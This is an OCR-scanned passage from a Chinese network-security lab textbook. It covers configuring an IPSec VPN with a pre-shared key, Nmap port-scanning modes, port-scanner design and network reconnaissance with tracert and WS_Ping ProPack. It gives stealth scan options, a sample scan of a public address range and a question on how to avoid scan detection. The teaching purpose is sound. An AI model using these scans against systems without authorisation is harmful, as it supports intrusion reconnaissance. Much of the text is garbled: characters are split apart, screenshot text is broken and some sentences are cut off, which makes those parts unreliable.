(1) 首先 运行 该 软件 ， 进 入 SSH 的 SSH Sentinel Policy Editor 窗口 。 单 击 Key 
Management 标签 ， 进 行 PSK 的 设置 (如 图 10-33 所 示 )。 

xi 


Security Policy Key Management | 


m- Trusted Policy Servers 
Ei GB Trusted Certificates 
Œ Certification Authorities 
由 国 Remote Hosts 
(8] Directory Services 
E e] My Keys 
由 -eg host key 
1m 


| 


Description 
k a new authentication key. 


OK | Cancel | Apply | 


图 10-33 SSH Sentinel Policy Editor 软件 Key Management 界面 


(2) 单 击 Add 按钮 ， 添 加 PSK， 进 入 如 图 10-34 所 示 的 界面 。 
(3) 选择 Create a pre-shared key， 然 后 单 击 【下 一 步 】 按 钮 ， 进 入 设置 PSK 名 称 与 
值 的 界面 (如 图 10-35 所 示 )。 
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New Authentication Key = x! 


This wizard guides you through the 
generation of a new authentication key. 


What kind of an authentication key would you 
like to create? 


C Create an authentication key pair and a+ 


c 


EE) 取消 | 


图 10-34 添加 PSK 


Pre-Shared Key Information “i 


Create Pre-Shared Key 
Type in the shared secret 


Give the pre-shared key a name that is for your reference only. Type 
the shared secret twice to avoid typos. Use the fingerprint to 
verify the secret with the other party involved in the communication 


Pre-shared key 
Name: Jesse 
Shared secret: pr 
Confirm shared [er 


Fingerprint 3d4f 2b£0 


«t-5e[ x | wi | 
图 10-35 ”创建 预 共 享 密 钥 


(4) 在 Name 文本 框 中 填写 该 PSK 的 名 称 ， 在 Shared secret 与 Confirm shared 文本 
框 中 填 入 PSK 的 值 ， 最 后 单 击 【 完 成 】 按 钮 。 可 以 在 设置 PSK 的 主 界面 中 看 到 名 为 test 
的 PSK 被 添加 了 。 然 后 ， 单 击 Security Policy, ZHI] IPSec 规则 (如 图 10-36 所 示 )。 

(5) 单 击 选 中 VPN Connections， 再 单 击 Add 按钮 ， 进 入 添加 规则 界面 (如 图 10-37 
所 示 )。 
进行 如 图 10-37 所 示 的 设置 ， 其中, 在 设置 Remote network 的 时 候 , 单 击 轩 按钮 后 ， 
进入 如 图 10-38 所 示 的 界面 ， 可 以 设置 远程 网 络 。 

(6) 在 添加 好 规则 后 ， 在 添加 规则 的 主 界 面 中 可 以 看 到 一 条 规则 被 添加 了 。 

可 以 测试 一 下 这 条 隧道 是 否 连 通 。 选 定 这 条 规则 ， 右 击 ， 选 择 Diagnostics. 

CD 最 后 ， 在 主 界面 上 单 击 OK 按钮 ， 至 此 ，SSH 已 经 配置 完毕 。 

(8) 具体 测试 VPN 设置 是 否 达到 了 预期 目的 ， 可 用 如 下 方法 。 
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"SSH Sentinel Policy Editor ERU zi =i 


Security Policy | Key Managenent | 


Policy [Ea Default =] S| sa S| 


[2] Pre-IPSec Filter 
(ag 


(aq) Secured Networks 
© Default Response 
($] Post-IPSec Filter 

图 Allow ell traffic 


Add... Renove | n | se | 


国 Secured Connections 


aaouo NOLLuNnUNa aanu 


E 


A virtual private network is created when the 
local host establishes an IPS. 


ec-protected 
connection to a remote private network through a 


Cancel | Apply | 
Fl 10-36 添加 IPSec 规则 


[ra ven connection 4] 


+3 Gateway IP 192 .1 1 1 
Remote network: frenotenet = Td 
Authentication few test =] 

P lc ey proposal) 


isgnostics. | Yroperties. .| Cancel 
图 10-37 编辑 IPSec 规则 


在 VPN 上 查看 【虚拟 专 网 】|IPSec|【 隧 道 状态 】 页 面 ， 如 果 显 示 已 连接 状态 ,表示 


VPN 隧道 建立 成 功 。 
【实验 报告 】 


(1) 根据 实验 步骤 ， 逐 一 完成 每 一 步 的 配置 。 查 看 每 一 步 的 实验 结果 和 上 面 叙 述 的 


是 否 一 致 ， 如 果 不 一 致 ， 请 分 析 原 因 。 


Network Editor j 


Give networks and subnetworks custom names. 
You can later use the names when creating 


p Defined networks 


New | Remove 
Network name: fremotenet 


IP address: 192 . 188 . 0 


Tal 


pA 255 . 255 . 25 . 0 


[c] en | 


aixi 


图 10-38 ”设置 远程 网 络 
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(2) 如 果 两 边 网 关 的 共享 密 钥 不 一 致 ， 会 出 现 什么 结果 ? 请 给 出 分 析 报告 。 

(3) 完成 上 面 的 实验 ， 搭 建 好 VPN 后 ， 通 过 Sniffer Pro 截获 数据 包 ， 查 看 里 面 的 内 
容 是 否 经 过 加 密 。 

【思考 题 】 

结合 实验 10.3 和 实验 10.4， 深 入 理解 IPSec VPN 的 搭建 过 程 。 
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11 网 络 端口 扫描 


11.1.1 ”端口 扫描 


【实验 目的 】 
掌握 使 用 端口 扫描 器 的 技术 ， 了 解 端口 扫描 器 的 原理 。 
【原理 简介 】 


服务 器 上 所 开放 的 端口 就 是 潜在 的 通信 通道 ， 也 就 是 一 个 入 侵 通 道 。 对 目标 计算 机 
进行 端口 扫描 ， 能 得 到 许多 有 用 的 信息 ， 进 行 端口 扫描 的 方法 很 多 ， 可 以 是 手工 进行 扫 
描 、 也 可 以 用 端口 扫描 软件 进行 。 

Nmap 是 著名 网 络 扫 描 工 具 ， 其 基本 功能 有 三 个 ， 一 是 探测 一 组 主机 是 否 在 线 ， 其 
次 是 扫描 主机 端口 ， 嗅 探 所 提供 的 网 络 服务 ， 还 可 以 推断 主机 所 用 的 操作 系统 。Nmap 
可 用 于 扫描 仅 有 两 个 节点 的 LAN， 直 至 500 个 节点 以 上 的 网 络 。Nmap 还 允许 用 户 定制 
扫描 技巧 。 通 常 ， 一 个 简单 的 使 用 ICMP 的 ping 操作 可 以 满足 一 般 需 求 ， 也 可 以 深入 探 
测 UDP 或 者 TCP 端口 ， 直 至 主机 所 使 用 的 操作 系统 ， 还 可 以 将 所 有 探测 结果 记录 到 各 
种 格式 的 日 志 中 ， 供 进一步 分 析 操 作 。 它 支持 多 种 协议 的 扫描 如 UDP，TCP connect()， 
TCP SYN (half open), ftp proxy (bounce attack), Reverse-ident, ICMP (ping sweep), 
FIN, ACK sweep, Xmas Tree, SYN sweep fil Null 扫描 。 可 以 从 SCAN TYPES 一 节 中 查 
看 相关 细节 。Nmap 还 提供 一 些 实用 功能 ， 如 通过 TCP/IP 来 识别 操作 系统 类 型 、 秘 密 扫 
描 、 动 态 延迟 和 重 发 、 平 行 扫描 、 通 过 并 行 的 ping 侦 测 下 属 的 主机 、 欺 骗 扫描 、 端 口 过 
滤 探 测 、 直 接 的 RPC 扫描 、 分 布 扫描 、 灵 活 的 目标 选择 以 及 端口 的 描述 。 

Nmap 支持 丰富 、 灵 活 的 命令 行 参数 。 例 如 ， 如 果 要 扫描 192.168.7 网 络 ， 可 以 用 
192.168.7.x/24 或 192.168.7.0 一 255 的 形式 指定 IP 地 址 范围 。 指 定 端口 范围 使 用 -p BA, 
如 果 不 指定 要 扫描 的 端口 , Nmap 默认 扫描 从 1 到 1024 再 加 上 nmap-services 列 出 的 端口 。 

如 果 要 查看 Nmap 运行 的 详细 过 程 ， 只 要 启用 verbose 模式 ， 即 加 上 -v 参数 ， 或 者 
加 上 -vv 参数 获得 更 加 详细 的 信息 。 例 如 ，nmap -sS 192.168.7.1-255 -p 20, 21, 53-110, 
30000- -v 命令 ,表示 执行 一 次 TCP SYN 扫描 ， 启 用 verbose 模式 ， 要 扫描 的 网 络 是 
192.168.7, 检测 20. 21. 53~110 以 及 30 000 以 上 的 端口 (指定 端口 清单 时 中 间 不 要 插 
入 空格 )。 再 举 一 个 例子 ，nmap -sS 192.168.7.1/24 -p 80 扫描 192.168.0 F, IRTE 80 
端口 监听 的 服务 器 (通常 是 Web 服务 器 )。 
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有 些 网 络 设备 ， 例 如 路 由 器 和 网 络 打印 机 ， 可 能 禁用 或 过 滤 某 些 端口 ， 禁 止 对 该 设 
备 或 跨越 该 设备 的 扫描 。 初 步 侦 测 网 络 情况 时 ，-host_timeout< 毫 秒 数 > 参 数 很 有 用 ， 它 
表示 超时 时 间 ， 例 如 nmap sS host timeout 10000 192.168.0.1 命令 规定 超时 时 间 是 
10 000ms. 

网 络 设备 上 被 过 滤 掉 的 端口 一 般 会 大 大 延长 侦 测 时 间 ， 设 置 超时 参数 有 时 可 以 显著 
降低 扫描 网 络 所 需 时 间 。Nmap 会 显示 出 哪些 网 络 设备 响应 超时 ， 这 时 就 可 以 对 这 些 设 
备 个 别处 理 , 保证 大 范围 网 络 扫 描 的 整体 速度 。 当 然 ，host_timeout 到 底 可 以 节省 多 少 扫 
描 时 间 ， 最 终 还 是 由 网 络 上 被 过 滤 的 端口 数量 决定 。 

Nmap 的 手册 (Man 文档 ) 详细 说 明了 命令 行 参数 的 用 法 (虽然 Man. 文档 是 针对 
UNIX 版 Nmap 编写 的 ， 但 同样 提供 了 Win32 版 本 的 说 明 )。 


【实验 环境 】 
局 域 网 环境 ，Nmap 扫描 系统 。 


【实验 步骤 】 

1. 各 种 扫描 模式 与 参数 

首先 输入 要 探测 的 主机 的 IP 地 址 作为 参数 。 假 如 一 个 LAN 中 有 两 个 节点 : 
192.168.0.1 和 192.168.0.2。 如 果 在 命令 行 中 输入 “nmap 192.168.0.2”， 输 出 结果 是 : 


Starting nmap V. 2.53 by fyodor@insecure.org (www.insecure.org/nmap) 
Interesting ports on LOVE (192.168.0.2): 

(The 1511 ports scanned but not shown below are in state:closed) 
Port State Service 

21/tcp open ftp 

23/tcp open telnet 

25/tcp open smtp 

79/tcp open finger 

80/tcp open http 

98/tcp open linuxconf 

111/tcp open sunrpc 

113/tcp open auth 

513/tcp open login 

514/tcp open shell 

515/tcp open printer 

6000/tcp open X11 

Nmap run completed -- 1 IP address (1 host up) scanned in 1 second 


以 上 是 对 目标 主机 进行 全 面 TCP 扫描 后 的 结果 。 显 示 了 监听 端口 的 服务 情况 。 这 一 
基本 操作 不 需要 任何 参数 , 缺点 是 运行 了 日 志 服 务 的 主机 可 以 很 容易 地 监测 到 这 类 扫描 。 
要 达到 隐蔽 功能 ， 必 须 设置 一 些 命令 选项 开关 ， 就 可 以 实现 较 高 级 的 功能 。 

Nmap 支持 以 下 4 种 最 基本 的 扫描 方式 。 

(1) TCP connect() 端 口 扫 描 (-sT BHO) 是 Nmap 默认 的 扫描 方式 。 

(2) TCP 同步 (SYN) 端口 扫描 〈-sS 参数 )。 
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(3) UDP 端口 扫描 (-sU 参数 )。 

(4) Ping 扫描 C-sP 参数 )。 

-sS 选项 可 以 进行 更 加 隐蔽 的 扫描 ,并 防止 被 目标 主机 检测 到 。 但 此 方式 需要 用 户 拥 
有 root 权限 。 假 如 目标 主机 安装 了 过 滤 和 日 志 软 件 来 检测 同步 空闲 字符 SYN， 那 么 -sS 
的 隐蔽 作用 就 失效 了 ， 此 时 可 以 采用 -SF〈 隐 项 FIN), -sX (Xmas Tree) 以 及 -SN (Null) 
方式 的 扫描 。 这 里 需要 注意 的 是 ， 由 于 微软 的 坚持 和 独特 ， 对 于 运行 Windows 95/98 或 
者 NT 的 机 器 , FIN, Xmas 或 者 Null 的 扫描 结果 将 都 是 端口 关闭 ， 由 此 也 是 推断 目标 主 
机 可 能 运行 Windows 操作 系统 的 一 种 方法 。 以 上 命令 都 需要 有 root 权限 。 

-sU 选项 是 监听 目标 主机 的 UDP 而 不 是 默认 的 TCP 端口 。 尽 管 在 Linux 机 器 上 有 
时 慢 一 些 ， 但 比 Window 系统 快 得 多 。 比 如 ， 输 入 上 面 的 例子 : 


nmap -sU 192.168.0.2 


结果 是 : 


Starting nmap V. 2.53 by fyodor@insecure.org (www.insecure.org/nmap) 
Interesting ports on LOVE (192.168.0.2): 

(The 1445 ports scanned but not shown below are in state: closed) 
Port State Service 

111/udp open sunrpc 

517/udp open talk 

518/udp open ntalk 

Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds 


2. 操作 系统 探测 

-O 选项 用 来 推断 目标 主机 的 操作 系统 , 可 以 与 上 述 的 命令 参数 联合 使 用 或 者 单独 调 
Hle Nmap 利用 TCP/IP“ 指 纹 ”技术 来 推测 目标 主机 的 操作 系统 。 还 使 用 前 面 的 例子 ， 
输入 : 


nmap -O 192.168.0.2 
结果 是 : 


Starting nmap V. 2.53 by fyodor@insecure.org (www.insecure.org/nmap) 
Interesting ports on LOVE (192.168.0.2): 
(The 1511 ports scanned but not shown below are in state:closed) 


TCP Sequence prediction: Class=random positive increments 
Difficulty=1772042 (Good luck!) 
Remote operating system guess: Linux 2.4.122 - 2.6.14 


Nmap 提供 了 一 个 OS 数据 库 ， 上 例 中 检测 到 了 Linux 以 及 内 核 的 版 本 号 。 
3. 更 进一步 的 应 用 
除了 一 次 只 扫描 一 个 目标 主机 ， 也 可 以 同时 扫描 一 个 主机 群 ， 比 如 下 例 : 
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nmap -sT -O 202.96.1.1-50 


就 可 以 同时 扫描 并 探测 IP 地 址 在 202.96.1.1~202.96.1.50 之 间 的 每 一 台 主 机 。 当 然 
这 需要 更 多 的 时 间 ， 耗 费 更 多 的 系统 资源 和 网 络 带宽 。 输 出 结果 也 可 能 很 长 。 所 以 ， 可 
以 使 用 下 面 的 命令 将 结果 重 定向 输送 到 一 个 文件 中 : 


nmap -sT -O -oN test.txt 202.96.1.1-50 


另外 的 一 些 命令 参数 选项 包括 : 

- 进行 TCP 反 向 用 户 认 证 扫描 ， 可 以 透露 扫描 用 户 信息 。 
-iR 进行 随机 主机 扫描 。 

-p 扫描 特定 的 端口 范围 。 

wv 长 数据 显示 ，-v -v 是 最 长 数据 显示 。 

综合 了 上 述 参数 的 命令 实例 如 下 : 


nmap -sS -p 23,80 -oN ftphttpscan.txt 192.168.1.1-100 


4. WinNmap 

Nmap 的 图 形 用 户 界 面 GUI，Windows 下 比较 著名 的 是 WinNmap. iti WinNmap, 
启动 程序 ， 在 Target(s) 中 输入 扫描 的 目标 ,在 Scan Type 中 选择 扫描 类 型 。 可 以 在 其 他 选 
项 卡 中 设置 所 需 的 扫描 参数 ， 如 图 11-1 所 示 。 


File View 
Tages): [19216801 


Scan | Discover| Time | Options| Fie | 


Scan Pots 
Type: [Defaut 到 


Pots [51 


图 11-1 设置 扫描 参数 
单 击 Scan 按钮 ， 系 统 开 始 扫 描 ， 结 束 后 会 显示 扫描 结果 ， 如 图 11-2 所 示 。 


【实验 报告 】 

(1) 描述 使 用 Nmap 对 系统 进行 网 络 端口 扫描 的 过 程 。 

(2) 使 用 实验 验证 Nmap 实验 参数 ， 并 分 析 各 自 的 技术 原理 和 优 缺 点 。 
【思考 题 】 

如 何 检 测 Nmap 的 扫描 ? 
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File View 


Target(s); [189216801 


Scan |Discover| Time | Options | File | 
Scan Type 


Tye: 已 


Param: | 


Scan Extensions 
[ RPCScan M OS Detection [ Version Probe 


1026/tep open LSA-or-nterm 

1029/tcp open ms-lsa 

1139/tcp open cce3z 

3268/tep open globalcatLDAP 

3269/tcp open globalcatLDAPssl 

MAC Address: 00:E0:4C:DD:14:F3 (Realtek Semiconductor) 

Device type: general purpose 

Running: Microsoft Windows 35/38/XE|NT/2X/XP. 

OS details: Microsoft Windows Millennium Edition (Me), Windows 2000 Profes: 


map finished: 1 IP address (1 host up) scanned in 3.325 seconds 


< 


Command: [nmap -sS 0 -PE -PS 192.168.0.1 


图 11-2 扫描 结 


11.1.2 ”端口 扫描 器 的 设计 


【实验 目的 】 
掌握 端口 扫描 器 的 设计 原理 。 


【原理 简介 】 

扫描 器 通过 选用 远程 TCP/IP 不 同 的 端口 的 服务 , 并 记录 目标 给 予 的 回答 , 通过 这 种 
方法 可 以 搜集 到 很 多 关于 目标 主机 的 各 种 有 用 的 信息 , 例如 远程 系统 是 否 支 持 匿 名 登录 、 
是 否 存 在 可 写 的 FTP 目录 、 是 否 开放 Telnet 服务 和 HTTPD 服务 等 。 

常用 端口 扫描 技术 如 下 。 

1. TCP connect() 扫 描 

这 是 最 基本 的 TCP 扫描 , 操作 系统 提供 的 connect() 系 统 调用 可 以 用 来 与 每 一 个 感 兴 
趣 的 目标 计算 机 的 端口 进行 连接 。 如 果 端 口 处 于 侦 听 状态 ， 那 么 connecti HERI. T 
则 ， 这 个 端口 是 不 能 用 的 ， 即 没有 提供 服务 。 这 个 技术 的 一 个 最 大 的 优点 是 ， 不 需要 任 
何 权限 ， 系 统 中 的 任何 用 户 都 有 权利 使 用 这 个 调用 。 另 一 个 好 处 就 是 速度 ， 如 果 对 每 个 
目标 端口 以 线性 的 方式 ， 使 用 单独 的 connect() 调 用 ， 那 么 将 会 花费 相当 长 的 时 间 ， 使 用 
者 可 以 通过 同时 打开 多 个 套 接 字 来 加 速 扫描 。 使 用 非 阻 塞 VO 允许 设置 一 个 低 的 时 间 用 
尽 周期 ， 同 时 观察 多 个 套 接 字 。 但 这 种 方法 的 缺点 是 易 被 察觉 ， 并 且 易 被 防火 墙 将 扫描 
信息 过 滤 掉 。 目 标 计算 机 的 logs 文件 会 显示 一 连 串 的 连接 和 连接 出 错 消息 ， 并 且 能 使 它 
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很 快 关闭 。 

2. TCP SYN 扫描 

这 种 技术 通常 认为 是 “ 半 开 放 ” 扫 描 ， 这 是 因为 扫描 程序 没有 必要 打开 一 个 完全 的 
TCP 连接 。 扫 描 程 序 发 送 的 是 一 个 SYN 数据 包 ， 好 像 准备 打开 一 个 实际 的 连接 并 等 待 
反应 一 样 (参考 TCP 的 三 次 握手 建立 一 个 TCP 连接 的 过 程 )。 一 个 SYNIACK 的 返回 信 
息 表示 端口 处 于 侦 听 状态 : 返回 RST 表示 端口 没有 处 于 侦 听 状态 。 如 果 收 到 一 个 
SYNIACK， 则 扫描 程序 必须 再 发 送 一 个 RST 信和 号， 来 关闭 这 个 连接 过 程 。 这 种 扫描 技 
术 的 优点 在 于 一 般 不 会 在 目标 计算 机 上 留 下 记录 ， 但 这 种 方法 的 缺点 是 必须 要 有 root AL 
限 才能 建立 自己 的 SYN 数据 包 。 

3. TCP FIN 扫描 

SYN 扫描 虽然 是 “ 半 开 放 ?” 方 式 扫描 , 但 在 某 些 时 候 也 不 能 完全 隐藏 扫描 者 的 动作 ， 
防火 墙 和 包 过 滤器 会 对 管理 员 指 定 的 端口 进行 监视 , 有 的 程序 能 检测 到 这 些 扫描 。 相反 ， 
FIN 数据 包 在 扫描 过 程 中 却 不 会 遇 到 这 种 问题 ， 这 种 扫描 方法 的 思想 是 关闭 的 端口 会 用 
适当 的 RST 来 回复 FIN 数据 包 。 另 一 方面 , 打开 的 端口 会 忽略 对 FIN 数据 包 的 回复 。 这 
种 方法 和 系统 的 实现 有 一 定 的 关系 ， 有 的 系统 不 管 端口 是 否 打开 都 会 回复 RST， 在 这 种 
情况 下 此 种 扫描 就 不 适用 了 。 另 外 ， 这 种 扫描 方法 可 以 非常 容易 地 区 分 服务 器 是 运行 
UNIX 系统 还 是 NT 系统 。 

4. IP 段 扫描 

这 种 扫描 方式 并 不 是 新 技术 ， 它 并 不 是 直接 发 送 TCP 探测 数据 包 ， 而 是 将 数据 包 分 
成 两 个 较 小 的 IP 段 。 这 样 就 将 一 个 TCP 头 分 成 好 几 个 数据 包 ， 从 而 过 滤器 就 很 难 探测 
到 。 但 必须 小 心 : 一 些 程序 在 处 理 这 些小 数据 包 时 会 有 些 麻烦 。 

5. TCP 反 向 ident 扫描 

ident 协议 允许 (RFC1413 ) 看 到 通过 TCP 连接 的 任何 进程 的 拥有 者 的 用 户 名 ， 即 
使 这 个 连接 不 是 由 这 个 进程 开始 的 。 例 如 扫描 者 可 以 连接 到 HTTP 端口 ， 然 后 用 ident 
来 发 现 服务 器 是 否 正 在 以 root 权限 运行 。 这 种 方法 只 能 在 和 目标 端口 建立 了 一 个 完整 的 
TCP 连接 后 才能 看 到 。 

6. FTP 返回 攻击 

FTP 的 一 个 有 趣 的 特点 是 它 支持 代理 (proxy) FTP 连接 ， 即 入 侵 者 可 以 从 自己 的 计 
算 机 self.com 和 目标 主机 target.com 的 FTP server-PI (协议 解释 器 ) 连接 ， 建 立 一 个 控制 
通信 和 连接。 然后 请 求 这 个 server-PI 激活 一 个 有 效 的 server-DTP (数据 传输 进程 来 给 
Internet 上 任何 地 方 发 送 文件 。 对 于 一 个 User-DTP， 尽 管 RFC 明确 地 定义 请 求 一 个 服务 
器 发 送 文件 到 另 一 个 服务 器 是 可 以 的 ， 但 现在 这 个 方法 并 不 是 非常 有 效 。 这 个 协议 的 缺 
点 是 “能 用 来 发 送 不 能 跟踪 的 邮件 和 新 闻 ， 给 许多 服务 器 造成 打击 ， 用 尽 磁盘 ， 企 图 越 
过 防火 墙 ”。 

7. UDP ICMP 端口 不 能 到 达 扫 描 

这 种 方法 与 上 面 几 种 方法 的 不 同 之 处 在 于 使 用 的 是 UDP， 而 非 TCP/IP. HT UDP 
很 简单 ， 所 以 扫描 变 得 相对 比较 困难 。 这 是 由 于 打开 的 端口 对 扫描 探测 并 不 发 送 确 认 信 
息 ， 关 闭 的 端口 也 并 不 需要 发 送 一 个 错误 数据 包 。 幸 运 的 是 ， 许 多 主机 在 向 一 个 未 打开 
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的 UDP 端口 发 送 数据 包 时 ， 会 返回 一 个 ICMP_PORT_UNREACH 错误 ， 这 样 扫描 者 就 
E 知 道 哪个 端口 是 关闭 的 。UDP 和 ICMP 错误 都 不 保证 能 到 达 ， 因 此 这 种 扫描 器 必须 还 
实现 在 一 个 包 看 上 去 是 丢失 的 时 候 能 重新 传输 。 这 种 扫描 方法 是 很 慢 的 ， 因 为 RFC 对 
ICMP 错误 消息 的 产生 速率 做 了 规定 。 同 样 这 种 扫描 方法 也 需要 具有 root 权限 。 

8. UDP recvfrom() 和 write() 扫 描 

当 非 root 用 户 不 能 直接 读 到 端口 不 能 到 达 错 误 时 ，Linux 能 间接 地 在 它们 到 达 时 通 
知 用 户 。 比 如 ， 对 一 个 关闭 的 端口 的 第 二 个 write() 调 用 将 失败 。 在 非 阻 塞 的 UDP ERF 
上 调用 recvfrom() 时 ,如果 ICMP 出 错 还 没有 到 达 时 会 返回 EAGAIN 一 一 重 试 .如 果 ICMP 
到 达 时 , 返回 ECONNREFUSED 一 一 连接 被 拒绝 。 这 就 是 用 来 查看 端口 是 否 打开 的 技术 。 

【实验 环境 】 

局 域 网 环境 ，VC++ 6.0 编译 器 。 

【实验 步骤 】 

(1) 分 析 Port Scanner 源码 Chttp://www.codeguru.com/cpp/i-n/network/tcpip/article. 
php/c7535/)， 了 人 解 基于 libpcap 开发 扫描 器 的 原理 。 

(2) 在 Port Scanner 源码 的 基础 上 实现 SYN 扫描 、FIN 扫描 、UDP 扫描 。 

【实验 报告 】 

(1) 阐述 基于 libpcap 网 络 包 开发 扫描 器 的 关键 技术 。 

(2) 详细 描述 在 源码 的 基础 上 实现 SYN 扫描 、FIN 扫描 、UDP 扫描 的 方法 和 实验 
结果 。 

【思考 题 】 

如 何 防止 扫描 行为 被 发 现 ? 


42 综合 扫描 及 安全 评估 


11.2.1 网 络 资源 检测 


【实验 目的 】 
掌握 搜集 目标 网 络 资源 信息 的 方法 和 常用 技术 。 


【原理 简介 】 

网 络 资源 信息 搜集 就 是 对 目标 主机 及 其 相关 设施 、 管 理 人 员 进 行 公开 或 非 公开 的 检 
测 、 了 解 ， 用 于 对 攻击 目标 安全 防卫 工作 的 掌握 ， 比 如 目标 主机 的 操作 系统 鉴别 等 。 这 
是 黑客 们 发 起 攻击 的 前 奏 ， 也 是 发 起 攻击 的 基础 。 内 容 包括 系统 、 网 络 、 数 据 及 用 户 活 
动 的 状态 及 其 行为 ， 而 且 ， 有 时 还 需要 在 计算 机 网 络 系统 中 的 若干 不 同 关键 点 ， 比 如 不 
同 网 段 和 不 同 主机 ， 来 搜集 所 需要 的 信息 。 

信息 搜集 大 致 可 以 分 为 以 下 两 步 。 
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1. 制定 目标 

这 里 所 说 的 目标 通常 分 为 两 种 ， 一 是 有 着 明显 的 攻击 目的 、 明 确 的 攻击 目标 ， 比 如 
中 美 黑客 大 战 时 指定 的 美国 段 IP; 二 是 随机 扫描 ， 事 先 并 没有 明确 的 攻击 意识 ， 后 来 由 
于 某 些 原因 (如 网 站 自身 的 缺陷 等 ) 所 制定 的 目标 ， 比 如 在 浏览 某 个 网 站 时 ， 感 觉 网 站 
做 得 不 错 ， 然 后 作为 自己 的 攻击 目标 。 

2. 具体 信息 搜集 

大 概 又 可 以 分 为 两 个 方面 ， 一 是 使 用 功能 强大 的 系统 安全 检测 软件 对 目标 系统 实施 
多 方位 安全 检测 ， 如 使 用 Tracert、WS_Ping ProPack、Nmap 等 检测 工具 ， 获 取信 息 后 经 
分 析 然 后 制定 有 效 的 攻击 策略 ， 二 是 使 用 社会 工程 学 原理 ， 按 照 事先 制定 的 目标 进行 入 
侵 前 的 信息 搜集 ， 这 往往 能 起 到 意 想不到 的 效果 ， 但 是 这 种 方法 要 求 比较 高 ， 也 比较 困 
难 ， 需 要 良好 的 思维 能 力 和 处 理 能 力 。 

Tracert〈 跟 踪 路 由 ) 是 路 由 跟踪 实用 程序 ， 一 般 操 作 系 统 附带 的 网 络 工 具 ， 用 于 确 
定 IP 数据 报 访问 目标 所 采取 的 路 径 。Tracert 命令 用 IP 生存 时 间 (TTL) 字段 和 ICMP 
错误 消息 来 确定 从 一 个 主机 到 网 络 上 其 他 主机 的 路 由 。Tracert 工作 原理 为 通过 向 目标 发 
送 不 同 IP 生存 时 间 (TTL) 值 的 “Internet 控制 消息 协议 (ICMP)” 回 应 数据 包 ，Tracert 
诊断 程序 确定 到 目标 所 采取 的 路 由 。 要 求 路 径 上 的 每 个 路 由 器 在 转发 数据 包 之 前 至 少将 
数据 包 上 的 TTL 递减 1。 数据 包 上 的 TTL 减 为 0 时 ， 路 由 器 应 该 将 “ICMP 已 超时 ”的 

Tracert 先 发 送 TTL 为 1 的 回应 数据 包 ， 并 在 随后 的 每 次 发 送 过 程 中 将 TTL 递增 1, 
直到 目标 响应 或 TTL 达到 最 大 值 ， 从 而 确定 路 由 。 通 过 检查 中 间 路 由 器 发 回 的 “ICMP 
已 超时 ”的 消息 确定 路 由 。 某 些 路 由 器 不 经 询问 直接 丢弃 TTL 过 期 的 数据 包 , 这 在 Tracert 
实用 程序 中 看 不 到 。 

Tracert 命令 按 顺 序 打 印 出 返回 “ICMP 已 超时 ”消息 的 路 径 中 的 近 端 路 由 器 接口 列 
表 。 如 果 使 用 -d 选项 ， 则 Tracert 实用 程序 不 在 每 个 IP 地址 上 查询 DNS. 

WS Ping Pro Pack 提供 给 搜集 目标 网 络 所 有 必需 的 工具 ， 可 以 获得 因特网 上 或 者 企业 
内 部 网 上 的 用 户 、 主 机 和 网 络 信息 。 它 可 以 帮助 确认 网 络 上 特定 设备 的 连接 状态 ， 量 化 测 
试 本 地 与 远程 系统 的 数据 连接 ， 漳 寻 网 络 主机 或 设备 的 路 径 ， 取 得 主机 名 称 和 IP 地 址 ， 
搜索 并 列 出 网 络 设备 及 网 络 服务 ， 查 看 SNMP 和 Windows 网 络 域 、 主 机 、 工 作 站 的 数值 ， 
寻找 LDAP 提供 的 信息 ， 例 如 用 户 全 名 和 邮件 地 址 。 它 是 一 个 具有 强大 功能 的 常用 工具 。 


【实验 环境 】 
局 域 网 环境 ，Windows 操作 系统 ，WS_Ping ProPack 软件 。 


【实验 步骤 】 

1. 使 用 Tracert 命令 检测 路 由 和 拓扑 结构 信息 

(1) 打开 【开始 】| 代 运行】 输入 “cmd”， 打 开 命令 行 窗口 。 

(2) 输入 以 下 命令 ， 观 察 结果 : tracert 192.168.1.x (x 为 合作 伙伴 的 座位 号 )。 

(3) 输入 tracert www.google.com, 4% Enter 键 确认 ， 观 察 结 果 ， 如 图 11-3 所 示 。 

图 11-3 反映 了 从 本 机 到 Google 站 点 所 经 过 的 路 由 信息 , 客观 地 显示 出 网 络 拓扑 结构 。 
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Documents Settings \yongquan>cd\ 


Dtracert www.google.com 


route to www-china 


ximum of 38 hop 


ce complete. 


图 11-3 Tracert 结果 
黑客 可 以 通过 这 命令 对 被 攻击 方 的 网 络 状况 有 一 个 初步 的 了 解 ， 为 他 实施 


定 基 础 。 同 时 ， 安 全 管理 人 员 也 可 以 借助 于 这 一 工具 探查 、 分 析 网 络 中 的 重 
(4) 输入 “tracert yahoo.com”， 回 车 确认 ， 观 察 结果 。 
(5) 登录 到 Linux 系统 中 ， 命令 
通过 使 用 Tracert 命令 可 以 检测 系统 的 拓扑 结构 , 这 样 就 可 以 在 

性 地 制定 安全 策略 、 实 施 防火 墙 架 构 ， 同 时 也 为 侦查 网 络 故 障 提供 路 由 级 
2. 使 用 WS_Ping ProPack 进行 网 络 检测 和 扫描 
(1) 获得 Ping ProPack 安装 包 文件 ， 然 后 进行 本 地 多 
(2) 单 击 【开始 】| 【程序 】|WS_Ping ProPack， 打 开 Ping ProPack 7? i 

所 示 。 


运行 TracertRoute 


2/5) x) 
File Edit Help 
Info | Time | HTML | Ping | TraceRoute | Lookup | Finger | Whois | LDAP 
Quote | Scan | sw | Wintet | Throughput About 
WS Ping ProPack, Ver 2.2, 2000.04 26 EVAL 31 day(s) remaining 
Internet Utilities 
- Copyright ? 1994-2000 Ipswitch, Inc. All rights reserved 
"nu This program may not be redistributed in any manner without written 
mm Permission from Ipswitch, Inc. and may only be used in conjunction 
IPSWITCH 
Send comments about this svalhelpüipswi tch. eed Product Info 
Winsock Description: — WinSock 2.0 = 
Winsock Status: Running "ad 
Winsock Version. 1.1/2.2 


Winsock MaxSockets 
Local Hostname 
Local IP Address 
Domain: 

Nane Server (s) 
Default Gateway 
Netmask 

[Free memory: 

[Disk space on C 
[Disk space on D 


Copyright (c) 1994-2000 Ipswitch, Inc. 


图 11-4 Ping ProPack 界面 


F-n 


要 路 由 节 节点 


， 可 以 看 出 同样 返回 了 路 由 信息 。 
! 客 攻击 之 前 有 针对 


3 ^. 
H o 


i, Wu 11-4 
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(3) 选择 Ping 选项 卡 ， 并 在 Host Name or IP 处 输入 “222.206.192.2”(2 为 任意 座 
位 号 )， 如 图 11-5 所 示 。 


te 


Scan inNet | Throughput | About 
Info | Time | HTML 


sm ine 
